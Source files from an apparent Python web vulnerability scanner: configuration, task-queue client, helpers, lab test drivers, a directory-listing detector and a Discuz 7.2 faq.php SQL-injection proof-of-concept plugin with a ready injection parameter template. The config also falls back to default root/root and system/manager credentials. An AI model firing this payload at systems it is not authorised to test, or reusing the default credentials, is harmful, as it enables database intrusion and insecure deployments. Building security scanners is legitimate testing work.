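    def get_vendor(self):
        """
            Returns the vendor name
        """
        return self._cpedict['vendor']

    def get_product(self):
        """
            Returns the product name
        """
        return self._cpedict['product']

    def get_version(self):
        """
            Returns the version of the cpe
        """
        return self._cpedict['version']

    def get_update(self):
        """
            Returns the update version
        """
        return self._cpedict['update']

    def get_edition(self):
        """
            Returns the cpe edition
        """
        return self._cpedict['edition']

    def get_language(self):
        """
            Returns the cpe language
        """
        return self._cpedict['language']

    def is_application(self):
        """
            Returns True if cpe describes an application
        """
        return self.get_part() == '/a'

    def is_hardware(self):
        """
            Returns True if cpe describes a hardware
        """
        return self.get_part() == '/h'

    def is_operating_system(self):
        """
            Returns True if cpe describes an operating system
        """
        return self.get_part() == '/o'
--------------------------------------------------------------------------------
/teye_config.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
teye_config.py

Central settings. The database and message-queue credentials can be
supplied through environment variables (the TEYE_* names are introduced in
this file); the previous literals remain the fallback so existing setups
keep working. The fallbacks are well-known default accounts and should be
replaced in any real deployment.
'''
import os
import sys
#Env Settings
#ROOT_PATH='/Users/imiyoo/workplace/tscanner'

# Absolute directory of this configuration file
ROOT_PATH = os.path.dirname(os.path.realpath(__file__))
LIB_PATH = ROOT_PATH + '/thirdparty/'

# Make the project root and the bundled libraries importable
sys.path.append(ROOT_PATH)
sys.path.append(LIB_PATH)

#File&Path Settings
DOMAIN_FILE = ROOT_PATH + '/teye_file/domain/small_domain_name.txt'
DIR_HOST_FILE = ROOT_PATH + '/teye_file/webdir/host.lst'
DIR_WEB_FILE = ROOT_PATH + '/teye_file/webdir/web.lst'
FINGER_FILE = ROOT_PATH + '/teye_file/finger/app.db'

#Env Path Settings
TEYE_PY_PATH = ROOT_PATH + '/teye.py'
NMAP_PATH ='/usr/bin/nmap'
PYTHON_ENV ='/usr/bin/python'

#SqlHelper Settings
class Configuration:
    # NOTE(review): absolute path inside one developer's home directory, and
    # it says "teye_files" while the paths above use "teye_file" - confirm
    # which location is meant before relying on it.
    SQLALCHEMY_DATABASE_URI = 'sqlite://///Users/imiyoo/workplace/tscanner_for_github/teye_files/db/scan.db'

class DevelopmentConfiguration(Configuration):
    pass

class ProductConfiguration(Configuration):
    pass


_config_table = {
    'default': DevelopmentConfiguration,
    'develope': DevelopmentConfiguration,
    'product': ProductConfiguration,
}


#Database Settings
WAT_Host='X.X.X.X'  #database host info
WAT_Database='wat'  #database name info
WAT_User=os.environ.get('TEYE_WAT_USER', 'root')  #database user info
WAT_Pass=os.environ.get('TEYE_WAT_PASS', 'root')  #database pass info

#Activemq Settings
ACTIVEMQ_ADDRESS="tcp://X.X.X.X:61617"
ACTIVEMQ_IP='X.X.X.X'
ACTIVEMQ_PORT='61617'
ACTIVEMQ_WATSERVER_QUEUE='/queue/WATSERVER'
ACTIVEMQ_WATCLIENT_QUEUE='/queue/WATCLIENT'
ACTIVEMQ_WATAPP_QUEUE='/queue/WATAPP'
ACTIVEMQ_USER=os.environ.get('TEYE_ACTIVEMQ_USER', 'system')
ACTIVEMQ_PASSWORD=os.environ.get('TEYE_ACTIVEMQ_PASSWORD', 'manager')


#Rpc Settings
RPYC_HOST="X.X.X.X"
RPYC_PORT=8888


#Dispatch Settings
MSG_INTERVAL=1
BIG_MSG_INTERVAL=1*60
RECV_MSG_TIME_IDLE =30
MAX_SCAN_TIME = 2*60*60
MAX_CONCURRENT_NUM = 2
MAX_DISPATCH_TASK = 10
MAX_RETRY_COUNT = 5
RETRY_INTERVAL = 1
SCAN_TASK_INTERVAL = 60
DISPATCH_TASK_INTERVAL= 10


#COMMON VULNS
SQL_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=1"
XSS_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=2"
LFI_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=3"
CMD_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=5"
BAK_KB="http://www.imiyoo.com/teye/index.php?c=vuln&a=detail&vid=6"
--------------------------------------------------------------------------------
/teye_worker/RDB.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
RDB.py
'''
import sys
sys.path.append("..")
import teye_config as Settings

import rpyc
import logging
import json

import time
import hashlib
import sys
import threading

class RDB:
    '''
    Thin client for the task service reached over rpyc at
    Settings.RPYC_HOST:Settings.RPYC_PORT.

    rpyc.connect() is called with host and port only, so no TLS or
    authenticator is configured on this side of the link.
    '''

    def __init__(self):
        '''
        Start without a connection; connect() creates it.
        '''
        self.__client = None


    def connect(self):
        '''
        Open the rpyc connection and call the remote open().

        Best effort: a failure is logged and the half-open connection is
        dropped, leaving the client unset.
        '''
        try:
            self.__client = rpyc.connect(Settings.RPYC_HOST,Settings.RPYC_PORT)

            self.__client.root.open()

        except Exception as e:
            logging.warning("RDB connect failed: %s", e)

            self.close()

    def getTaskcount(self):
        '''
        Return the task count reported by the service as an int
        (first column of the first row of the remote result).
        '''
        if self.__client is None:
            self.connect()

        result = self.__client.root.client_getTaskcount()

        count = int(result[0][0])

        return count

    def getNewtasks(self,num):
        '''
        Fetch up to `num` new tasks.

        :return: list of {"taskid": ..., "msg": <JSON string>} where the
            JSON carries taskid, website and profile taken from columns
            0, 1 and 2 of each remote row
        '''
        data=[]

        if self.__client is None:
            self.connect()

        result = self.__client.root.client_getNewtasks(num)

        # teye_config.py as listed defines no WAT_MSG_INFO; use it as the
        # message template when a deployment provides one, else start empty.
        template = getattr(Settings, 'WAT_MSG_INFO', {})

        for task in result:
            # Fresh copy per task so the shared settings dict is never mutated.
            msg_info = dict(template)
            msg_info['taskid']=task[0]
            msg_info['website']=task[1]
            msg_info['profile']=task[2]
            msg = json.dumps(msg_info)

            content={"taskid":task[0],"msg":msg}

            data.append(content)

        return data

    def updateStart(self,taskid,starttime):
        '''
        Record the start time of a task on the service. Always returns True.
        '''
        self.__client.root.client_update_starttime(taskid,starttime)

        return True

    def updateFinish(self,taskid,finishtime):
        '''
        Record the finish time of a task on the service. Always returns True.
        '''
        self.__client.root.client_update_finishtime(taskid,finishtime)

        return True

    def updateProgress(self,taskid,progress):
        '''
        Record the progress of a task on the service. Always returns True.
        '''
        self.__client.root.client_update_progress(taskid,progress)

        return True

    def updateStatus(self,taskid,status,msginfo=''):
        '''
        Record the status of a task on the service. Always returns True.

        0----init
        1----queue
        2----scan
        3----stop
        4----erro
        5----finish
        '''

        self.__client.root.client_updateStatus(taskid,status,msginfo)

        return True

    def updateFlag(self,taskid):
        '''
        Call the remote client_update_flag for the task. Always returns True.
        '''

        self.__client.root.client_update_flag(taskid)

        return True

    def close(self):
        '''
        Close the remote session and the connection, then forget the client
        so that a later getNewtasks() reconnects instead of reusing a closed
        connection.
        '''
        if self.__client is None:
            return

        try:
            self.__client.root.close()
        except Exception:
            # The remote side may already be gone; closing stays best effort.
            pass

        try:
            self.__client.close()
        finally:
            self.__client=None

if __name__=="__main__":
    rdb =RDB()
    rdb.connect()
    result =rdb.getNewtasks(3)
    print result
--------------------------------------------------------------------------------
/teye_data/info.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
info.py
++++++++++++++++++++++++
{
    "scan_node":"",
    "entry":"www.baidu.com",
    "scan_target":[],
    "domain":"",
    "ipaddr":"",
    "port":"",
    "finger":[],
    "nameserver":[],
    "subdomain":[],
    "relate_ipaddr":[],
    "dir":[],
    "vuln":[]
}
+++++++++++++++++++++++
'''

import json

class info(dict):
    '''
    Dictionary holding the collected data of one scan; the keys are created
    in __init__ and the setters below are plain item assignments.
    '''
    def __init__(self):
        '''
        Create every key with an empty value.
        '''
        self["scan_node"]    = ""
        self["entry"]        = ""
        self["start_time"]   = ""
        self["end_time"]     = ""
        self["scan_profile"] = None
        self["scan_target"]  = []
        self["domain"]       = ""
        self["ipaddr"]       = ""
        self["port"]         = ""
        self["finger"]       = []
        self["nameserver"]   = []
        self["subdomain"]    = []
        self["relate_ipaddr"]= []
        self["dir"]          = []
        self["vuln"]         = []

        #external
        self["api"]          = []

    def set_profile(self,profile):
        '''
        Store the scan profile under "scan_profile".
        '''
        self["scan_profile"]=profile

    def set_myip(self,myip):
        '''
        Store the scanning node's address under "scan_node".
        '''
        self["scan_node"]=myip

    def set_entry(self,site):
        '''
        Store the entry site under "entry".
        '''
        self["entry"] = site

    def set_start_time(self,starttime):
        '''
        Store the start time under "start_time".
        '''
        self["start_time"] = starttime

    def set_end_time(self,endtime):
        '''
        Store the end time under "end_time".
        '''
        self["end_time"] = endtime

    def set_domain(self,domain):
        '''
        Store the domain under "domain".
        '''
        self["domain"] = domain

    def set_ipaddr(self,ipaddr):
        '''
        Store the IP address under "ipaddr".
        '''
        self["ipaddr"] = ipaddr

    def set_port(self,port):
        '''
        Store the port data under "port".
        '''
        self["port"] = port

    def set_finger(self,finger):
        '''
        Store the fingerprint data under "finger".
        '''
        self["finger"] = finger

    def set_subdomain(self,subdomain):
        '''
        Store the subdomain data under "subdomain".
        '''
        self["subdomain"] = subdomain

    def set_relate_ipaddr(self,ip_list):
        '''
        Store the related addresses under "relate_ipaddr".
        '''
        self["relate_ipaddr"] = ip_list

    def set_vuln(self,vuln):
        '''
        Store the findings under "vuln".
        '''
        self["vuln"] = vuln

    def set_api(self,api):
        '''
        Store the external data under "api".
        '''
        self["api"] = api

    def set_data(self,key,value):
        '''
        Store `value` under an arbitrary key.
        '''
        self[key] = value

    def get_data(self,key):
        '''
        Return the value stored under `key`; raises KeyError when absent.
        '''
        return self[key]

    def __str__(self):
        '''
        Return the whole record as a JSON string.
        '''
        msg = json.dumps(self)

        return msg

    def __repr__(self):
        '''
        Short description built from the entry and the IP address.

        The values are stored as dictionary items, not as _entry/_ipaddr
        attributes, and the format string on the page had no placeholders,
        so the previous body could not produce a result.
        '''
        return "<info entry=%s ipaddr=%s>" % (self["entry"],self["ipaddr"])


db_info = info()
--------------------------------------------------------------------------------
/misc/common.py:
--------------------------------------------------------------------------------
# coding=utf-8
'''
common.py
'''

import json
import string
import hashlib
import urllib2

from random import choice, randint


def rand_letters(length=0):
    '''
    Return a string of random ASCII letters.

    :param length: number of letters; 0 picks a random length from 6 to 10

    Built on the `random` module, so the result is not suitable as a secret.
    '''
    return ''.join(choice(string.letters)
                   for _ in xrange(length or randint(6, 10)))


def rand_numbers(length=0):
    '''
    Return a string of random digits whose first digit is never "0".

    :param length: number of digits; 0 picks a random length from 6 to 10

    Built on the `random` module, so the result is not suitable as a secret.
    '''
    t_list = []
    for i in xrange(length or randint(6, 10)):
        pool = string.digits[1:] if i == 0 else string.digits
        t_list.append(choice(pool))
    return ''.join(t_list)


def md5(str):
    '''
    Return the hexadecimal MD5 digest of `str`.

    Fine as a fingerprint; MD5 is not collision resistant, so it should not
    back integrity checks or password storage.
    '''
    return hashlib.md5(str).hexdigest()


def get_my_ip():
    '''
    Ask an external service for this host's public address.

    Best effort: returns "" when the request or the parsing fails. The
    lookup goes over plain HTTP, so the answer is unauthenticated.
    '''
    api = "http://ip.taobao.com/service/getIpInfo.php"
    ipaddr = ""
    try:
        req = urllib2.Request(api, data="ip=myip")
        # Bounded wait so an unreachable service cannot block the caller.
        res = urllib2.urlopen(req, timeout=10)
        data = json.loads(res.read())
        ipaddr = data["data"]["ip"]
    except Exception:
        pass

    return ipaddr


def is_404(res_body):
    '''
    Return True when the body contains one of the known "page not found"
    phrases.

    The comparison is done on unicode text. The earlier version encoded the
    body to bytes and then searched it for unicode patterns; for a body with
    non-ASCII bytes that raised inside the try block and the function
    answered False, so localized error pages were never recognised.
    '''
    T_404_key = [u"抱歉,您访问的页面", u"404-页面不存在", u"很抱歉,您要访问的页面不存在!", u"error404"]

    if isinstance(res_body, unicode):
        text = res_body
    elif isinstance(res_body, str):
        # Undecodable bytes are dropped rather than aborting the check.
        text = res_body.decode("utf-8", "ignore")
    else:
        # None or any other type: nothing to search.
        return False

    for pattern in T_404_key:
        if pattern in text:
            return True

    return False


def is_ip_address(address):
    '''
    Return True when `address` is a dotted quad whose four parts are plain
    decimal numbers from 0 to 255.

    Parts with signs or surrounding blanks are rejected.
    '''
    parts = address.split(".")
    if len(parts) != 4:
        return False

    for item in parts:
        if not item.isdigit():
            return False
        if not 0 <= int(item) <= 255:
            return False

    return True


def is_equal_list(s_list, o_list):
    '''
    Return True when both arguments are lists of the same length and every
    item of `s_list` occurs in `o_list`; False otherwise.

    Duplicates are not counted separately, so this is a containment test on
    equally long lists rather than a strict multiset comparison.
    '''
    if not isinstance(s_list, list) or not isinstance(o_list, list):
        return False

    s_len = len(s_list)
    o_len = len(o_list)

    if s_len != o_len:
        return False

    count = 0
    for item in s_list:
        if item in o_list:
            count += 1

    # Explicit boolean; the mismatch case used to fall through and yield None.
    return count == s_len


if __name__ == "__main__":
    ip = get_my_ip()
    print ip
--------------------------------------------------------------------------------
/scan_log.py: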
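--------------------------------------------------------------------------------
#coding=utf-8
'''
scan_log.py

Parse one access-log line, rebuild the HTTP request it describes and hand
it to the scan engine. Access logs in this format hold Referer, Cookie and
request-body values, so the input file is as sensitive as the sessions it
recorded.
'''
'''
192.168.126.1 - - [17/Dec/2016:17:52:45 +0800] "GET /p.php?act=rt&callback=jQuery170013389064965628972_1481968361729&_=1481968365810 HTTP/1.1" 192.168.126.145 200 416 "http://192.168.126.145/p.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" "2zA_sid=1QFL02; mycookie=you are spider" "-" "-"
'''

import re
from teye_web.http.URL import URL
from teye_web.http.Request import Request
from teye_web.http.cookie import cookie
from teye_web.http.postdata import postdata

from teye_data.vulnmanager import vm

# Verbose pattern: one capture group per log field, in log order.
log_pattern=re.compile(r'''
    ([^\s]+)\s              #remote_ip
    -\s-\s(\[[^\]]+\])\s    #[time]
    ("[^"]+")\s             #request
    ([^\s]+)\s              #host
    (\d{3})\s               #Code
    (\d+)\s                 #body_bytes_send
    "([^"]+)"\s             #http_referer
    "([^"]+)"\s             #http_user_anget
    "([^"]+)"\s             #http_cookie
    "([^"]+)"\s             #http_x_forward_for
    "([^"]+)"               #request_body
    ''',re.X)

log='192.168.126.1 - - [17/Dec/2016:17:52:45 +0800] "GET /p.php?act=rt&callback=jQuery170013389064965628972_1481968361729&_=1481968365810 HTTP/1.1" 192.168.126.145 200 416 "http://192.168.126.145/p.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" "2zA_sid=1QFL02; mycookie=you are spider" "-" "-"'



match = log_pattern.match(log)
if match:
    info_tuple = match.groups()
    #print info_tuple
    log_ip            = info_tuple[0]
    log_time          = info_tuple[1]
    log_request       = info_tuple[2]
    log_host          = info_tuple[3]
    log_referer       = info_tuple[6]
    log_cookie        = info_tuple[8]
    log_x_forward_for = info_tuple[9]
    log_body          = info_tuple[10]


    # log_request still carries its quotes: '"GET <uri> HTTP/1.1"'
    temp_request = log_request.split(" ")

    method = temp_request[0][1:].upper()
    # The split has already separated the protocol token, so the second
    # element is the complete URI; cutting 8 more characters off it, as the
    # earlier slice did, dropped the end of the query string.
    uri = temp_request[1]
    # NOTE(review): no scheme is prepended here - confirm URL() accepts a
    # bare "host/path" string.
    url = log_host + uri

    headers = {"Referer": log_referer, "Cookie": log_cookie}
    # "-" is the log's placeholder for an absent header.
    if log_x_forward_for != '-':
        headers["X-Forward-For"] = log_x_forward_for

    post_data = postdata(log_body)
    urlobj = URL(url)

    req = None
    if method == "GET":
        req = Request(urlobj,method,headers=headers)
    elif method == "POST":
        req = Request(urlobj,method,headers=headers,post_data=post_data)

    # Other methods are not rebuilt; without this guard the lines below
    # failed on an undefined name.
    if req is not None:
        print req
        from teye_core.tcore import tCore
        scan_engine = tCore()
        scan_engine.scan_request(req)

print vm.get_all_vuln()
--------------------------------------------------------------------------------
/tests/test_common_vuln.py:
--------------------------------------------------------------------------------
#coding=utf-8

from teye_web.http.Request import Request
from teye_web.sql import sql
from teye_web.xss import xss
from teye_web.cmd import cmd
from teye_web.lfi import lfi
from teye_web.bak import bak
from teye_web.ver import ver
from teye_data.vuln import vuln
from teye_data.vulnmanager import vm


# These functions drive each plugin against practice pages on private lab
# addresses and print what the vulnerability manager collected; they make no
# assertions.

def test_sql():
    '''
    Run the sql plugin over the lab pages, one fresh plugin per URL.
    '''
    url_list = [("number","http://192.168.126.143/book/sql/1_sql.php?id=1"),
                ("char_single","http://192.168.126.143/book/sql/2_sql.php?id=1"),
                ("char_dobule","http://192.168.126.143/book/sql/3_sql.php?id=1"),
                ("search_single","http://192.168.126.143/book/sql/4_sql.php?search=a"),
                ("search_dobule","http://192.168.126.143/book/sql/5_sql.php?search=a"),
                ]

    # The first tuple element only labels the case; it is not used.
    for _label, url in url_list:
        t_scanner=sql()
        t_scanner.check(Request(url))
    print vm.get_all_vuln()

def test_xss():
    '''
    Run the xss plugin over the lab pages, one fresh plugin per URL.
    '''
    url_list=['http://192.168.126.143/book/xss/1_xss.php?data=test',
              'http://192.168.126.143/book/xss/2_xss.php?data=test',
              'http://192.168.126.143/book/xss/3_xss.php?data=test'
              ]

    for url in url_list:
        t_scanner = xss()
        t_scanner.check(Request(url))

    print vm.get_all_vuln()

def test_lfi():
    '''
    Run the lfi plugin over the lab pages, one fresh plugin per URL.
    '''
    url_list=['http://192.168.126.145/book/lfi/1_lfi.php?data=test',
              'http://192.168.126.145/book/lfi/2_lfi.php?data=test',
              'http://192.168.126.145/book/lfi/3_lfi.php?data=test'
              ]

    for url in url_list:
        t_scanner = lfi()
        t_scanner.check(Request(url))

    print vm.get_all_vuln()

def test_cmd():
    '''
    Run the cmd plugin over the lab pages, one fresh plugin per URL.
    '''
    url_list=['http://192.168.126.145/book/cmd/1_cmd.php?data=test',
              'http://192.168.126.145/book/cmd/2_cmd.php?data=test',
              'http://192.168.126.145/book/cmd/3_cmd.php?data=test',
              'http://192.168.126.145/book/cmd/4_cmd.php?data=test',
              'http://192.168.126.145/book/cmd/5_cmd.php?data=test'
              ]

    for url in url_list:
        t_scanner = cmd()
        t_scanner.check(Request(url))

    print vm.get_all_vuln()

def test_bak():
    '''
    Run the bak plugin against one lab page.
    '''
    bak_url="http://192.168.126.143/book/bak/2.php"
    t_scanner=bak()
    t_scanner.check(Request(bak_url))

    print vm.get_all_vuln()

def test_ver():
    '''
    Run the ver plugin against one lab directory.
    '''
    ver_url="http://192.168.126.143/book/ver/"
    t_scanner=ver()
    t_scanner.check(Request(ver_url))
    print vm.get_all_vuln()
--------------------------------------------------------------------------------
/teye_util/progress.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
progress.py
'''

import time
from LogManager import log

class progress:
    '''
    Track how far a scan has come and estimate the time it still needs.
    '''
    def __init__(self):
        '''
        Start with no total, no progress and no estimate.
        '''
        self._max_value=0
        self._current_value=0
        self._first_amount_change_time=None
        self._eta=None

    def set_total_amount(self,value):
        '''
        Set the total number of units and restart counting.

        The counter restarts at 0.1 rather than 0.
        '''
        self._max_value=value
        self._current_value=0.1
        self._first_amount_change_time=None


    def inc(self):
        '''
        add 1 small unit to the current value
        '''
        # Repeated 0.1 steps rarely land exactly on the maximum, so an
        # equality test would let the counter run past it.
        if self._current_value >= self._max_value:
            log.error('Current value can never be greater than max value!')
        else:
            self._current_value +=0.1
            self._update_eta()

    def incplugin(self):
        '''
        add 1 big unit to the current value
        '''

        if self._current_value >= self._max_value:
            log.error('Current value can never be greater than max value!')
        else:
            self._current_value +=1
            self._update_eta()

    def _update_eta(self):
        '''
        Refresh the estimate: scale the time elapsed since the first update
        by max/current and subtract the elapsed time. The first call only
        records the start time.
        '''
        if not self._first_amount_change_time:
            self._first_amount_change_time=time.time()
        else:
            time_already_elapsed=time.time()-self._first_amount_change_time

            try:
                time_for_all_requests = (self._max_value * time_already_elapsed)/self._current_value
            except ZeroDivisionError:
                time_for_all_requests = time_already_elapsed * 2
            else:
                self._eta = time_for_all_requests - time_already_elapsed


    def get_progress(self):
        '''
        Return the progress as an integer percentage; 0 when no total is set.
        '''
        if self._max_value ==0:
            return 0

        return int((self._current_value / self._max_value)*100)

    def finish(self):
        '''
        Mark the work as complete (100 percent) and clear the estimate.
        '''
        self._max_value=1
        self._current_value =1
        self._first_amount_change_time = None
        self._eta = None

    def get_eta(self):
        '''
        Return the estimated remaining time as (days, hours, minutes,
        seconds); all zero while no estimate exists. Seconds stay a float.
        '''
        if not self._eta:
            return 0,0,0,0

        self._update_eta()

        # float() - the earlier code called an undefined name here and
        # raised NameError as soon as an estimate existed.
        temp = float(self._eta) / (60*60*24)
        d = int(temp)
        temp = (temp-d)*24
        h = int(temp)
        temp = (temp-h)*60
        m = int(temp)
        temp = (temp-m)*60
        sec = temp

        return d,h,m,sec

--------------------------------------------------------------------------------
/thirdparty/libnmap/test/test_cpe.py: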
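--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from libnmap.objects.os import CPE
import unittest


class TestNmapFP(unittest.TestCase):
    """Checks for the CPE accessors."""

    def setUp(self):
        # test_cpe picks entries by index; keep the order stable.
        self.cpelist = ['cpe:/a:apache:http_server:2.2.22',
                        'cpe:/a:heimdal:kerberos',
                        'cpe:/a:openbsd:openssh:5.9p1',
                        'cpe:/o:apple:iphone_os:5',
                        'cpe:/o:apple:mac_os_x:10.8',
                        'cpe:/o:apple:mac_os_x',
                        'cpe:/o:linux:linux_kernel:2.6.13',
                        'cpe:/o:linux:linux_kernel',
                        'cpe:/o:microsoft:windows_7',
                        'cpe:/o:microsoft:windows_7::-:professional',
                        'cpe:/o:microsoft:windows_7::sp1',
                        'cpe:/o:microsoft:windows',
                        'cpe:/o:microsoft:windows_server_2008::beta3',
                        'cpe:/o:microsoft:windows_server_2008',
                        'cpe:/o:microsoft:windows_server_2008::sp1',
                        'cpe:/o:microsoft:windows_vista::-',
                        'cpe:/o:microsoft:windows_vista::sp1',
                        'cpe:/o:microsoft:windows_vista::sp2']

    def test_cpe(self):
        """Part flags of an application CPE, and fields left empty by '::'."""
        apa = CPE(self.cpelist[0])

        self.assertTrue(apa.is_application())
        self.assertFalse(apa.is_hardware())
        self.assertFalse(apa.is_operating_system())


        win = CPE(self.cpelist[12])
        self.assertEqual(win.get_vendor(), 'microsoft')
        self.assertEqual(win.get_product(), 'windows_server_2008')
        self.assertEqual(win.get_version(), '')
        self.assertEqual(win.get_update(), 'beta3')
        self.assertEqual(win.get_edition(), '')
        self.assertEqual(win.get_language(), '')

    def test_full_cpe(self):
        """Every accessor of a CPE string that fills all fields but update."""
        cpestr = 'cpe:/a:mozilla:firefox:2.0::osx:es-es'
        resdict = { 'part':'/a', 'vendor':"mozilla", 'product':"firefox", 'version':"2.0", 'update':'', 'edition':"osx", 'language':'es-es' }
        ocpe = CPE(cpestr)
        objdict = {'part': ocpe.get_part(),
                   'vendor': ocpe.get_vendor(),
                   'product': ocpe.get_product(),
                   'version': ocpe.get_version(),
                   'update': ocpe.get_update(),
                   'language': ocpe.get_language(),
                   'edition': ocpe.get_edition()
        }
        self.assertEqual(objdict, resdict)

if __name__ == '__main__':
    test_suite = ['test_cpe', 'test_full_cpe']
    suite = unittest.TestSuite(map(TestNmapFP, test_suite))
    test_result = unittest.TextTestRunner(verbosity=2).run(suite)
--------------------------------------------------------------------------------
/teye_poc/discuz_faq_sql.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# coding=utf-8

import sys

# NOTE(review): absolute path of one developer machine; the plugin only
# imports elsewhere if the project root is importable by other means.
sys.path.append("/Users/imiyoo/workplace/tscanner/")

import re
from teye_web.http.URL import URL
from teye_web.util.error_sql import get_error_sql_key

# urllib2,requests,httplib2
from wCurl import wcurl

from teye_poc.PocScan import PocScan
from LogManager import log

import httplib

# NOTE(review): process-wide switch, set on import. Every httplib connection
# in the process then prints its request and response headers to stdout,
# which includes cookies and credentials sent by unrelated code.
httplib.HTTPConnection.debuglevel = 1

from teye_data.vulnmanager import vm


class discuz_faq_sql(PocScan):
    '''
    Check for the issue described in self._poc_info: one request is sent to
    faq.php and the response body is searched for a marker string.
    '''

    def __init__(self):
        '''
        Fill in the metadata, the target file and the parameter template.
        '''
        self._poc_info = {

            'w_hat': {
                'author': "imiyoo",
                'blog': "http://www.imiyoo.com",
                'team': "W.A.T",
                'create_time': "2014-11-21"
            },
            'w_vul': {
                'id': u"WID-2014-0002",
                'title': u"Discuz7.2 faq.php SQL注入漏洞",
                'method': u"GET",
                'tag': u"discuz",
                'rank': u"高危",
                'info': u"http://www.watscan.com/"
            }
        }

        self._vuln_file = "faq.php"

        self._vuln_param = "action=grouppermission&gids[10]=\\&gids[11][0]=)||{SQL}%23"

        # Scan mode: 0 = domain mode, 1 = path mode (check the URL path the
        # user supplied)
        self._scan_mode = 0

    def check(self, url):
        '''
        Request faq.php under the domain path of `url` and record a finding
        through security_hole() when the marker is found in the response.

        :param url: URL object of the target
        '''
        log.info(u"正在检测目标是否存在:[%s]..." % self.get_title())
        domain_path = url.get_domain_path()
        exp_url = domain_path.urljoin(self._vuln_file)
        error_sql, error_key = get_error_sql_key(type="floor")
        exp_params = self._vuln_param.replace("{SQL}", error_sql)
        res = wcurl.get(exp_url, params=exp_params)
        if self._find_vuln(res, error_key):
            self.security_hole(exp_url)

    def _find_vuln(self, res, key):
        '''
        Return True when `key` occurs in the response body, False when it
        does not or when there is no body.
        '''
        body = res.body
        if body is None:
            return False

        # find() returns 0 for a match at the very start of the body; the
        # earlier "> 0" comparison treated that case as "not found".
        return body.find(key) > -1

    def get_name(self):
        '''
        Return the class name as the plugin name.
        '''
        return self.__class__.__name__


if __name__ == "__main__":
    from optparse import OptionParser

    usage = "usage: %prog [options] arg"
    parser = OptionParser(usage)
    parser.add_option("-u", "--url", action="store", dest="url", default=None, help="Scan the target url")
    (options, args) = parser.parse_args()
    if not options.url:
        parser.print_help()
        sys.exit(-1)
    else:
        url = options.url
        target_url = URL(url)
        check_inst = discuz_faq_sql()
        check_inst.check(target_url)
        print vm.get_all_vuln()
--------------------------------------------------------------------------------
/teye_web/directory.py:
--------------------------------------------------------------------------------
# coding=utf-8
'''
directory.py
'''
import sys

# NOTE(review): absolute path of one developer machine.
sys.path.append("/Users/imiyoo/workplace/teye_scan/")

from misc.common import is_404
import copy
import teye_data.severity as severity
from teye_data.vuln import vuln
from teye_data.vulnmanager import vm

from LogManager import log

# wCurl
from wCurl import wcurl
from http.Request import Request


class directory:
    '''
    Plugin that reports directories for which the web server returns an
    automatic file listing.
    '''

    def __init__(self):
        '''
        Set up the listing signatures and the cache of visited directories.
        '''
        # Text fragments found in generated listing pages. They are compared
        # as plain substrings.
        self._DIR_INDEXING = (
            "Index of /",
            '<a href="?C=N;O=D">Name</a>',
            '<A HREF="?M=A">Last modified</A>',
            "Last modified</a>",
            "Parent Directory</a>",
            "Directory Listing for",
            "<TITLE>Folder Listing.",
            '<table summary="Directory Listing" ',
            "- Browsing directory ",
            # IIS 6.0 and 7.0
            '">[To Parent Directory]</a><br><br>',
            # IIS 5.0
            # NOTE(review): this entry is written as a regular expression,
            # but _find_vuln() searches it literally, so it cannot match.
            '<A HREF=".*?">.*?</A><br></pre><hr></body></html>'
        )

        self._already_dir_urls = []

    def check(self, t_request):
        '''
        Fetch each directory of the request URL and register a
        medium-severity finding for the first one that shows a listing.

        :param t_request: request object; it is deep-copied, not modified
        '''
        log.info(u"正在检测目标是否存在Directory目录列举漏洞...")

        http_request = copy.deepcopy(t_request)
        url_obj = http_request.get_url()
        dir_list = url_obj.get_dirs()

        for item in dir_list:
            # NOTE(review): a directory seen earlier ends the whole check,
            # not just this iteration. That is only right if get_dirs()
            # yields the deepest directory first - confirm.
            if item in self._already_dir_urls:
                return

            self._already_dir_urls.append(item)

            req_url = item.get_uri_string()

            res = wcurl.get(req_url)

            if self._find_vuln(res):
                v = vuln()
                v.set_url(req_url)
                v.set_method("GET")
                v.set_param("")
                v.set_name("Directory List Vuln")
                v.set_rank(severity.M)
                vm.append(self, http_request.get_url().get_host(), "directory", v)

                log.info("Directory List Vuln")
                print "----------Directory List Vuln"
                break

    def _find_vuln(self, res):
        '''
        Return True when the response is a 200 page that is_404() does not
        classify as an error page and that contains a listing signature;
        False in every other case.
        '''
        if res is None:
            return False

        res_body = res.body

        if res_body is None:
            return False

        if res.get_code() != 200 or is_404(res_body):
            # Explicit result; this path used to fall through and yield None.
            return False

        for item in self._DIR_INDEXING:
            if res_body.find(item) > -1:
                return True

        return False

    def get_name(self):
        '''
        Return the plugin identifier.
        '''
        return "teye_directory_plugin"


if __name__ == "__main__":
    # Manual run against a single URL.
    req_url = "http://bbs.wdai.com/data/attachment/forum/201507/08/"
    req = Request(req_url)
    vuln_inst = directory()
    vuln_inst.check(req)
--------------------------------------------------------------------------------
/thirdparty/libnmap/test/test_report_diff.py: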
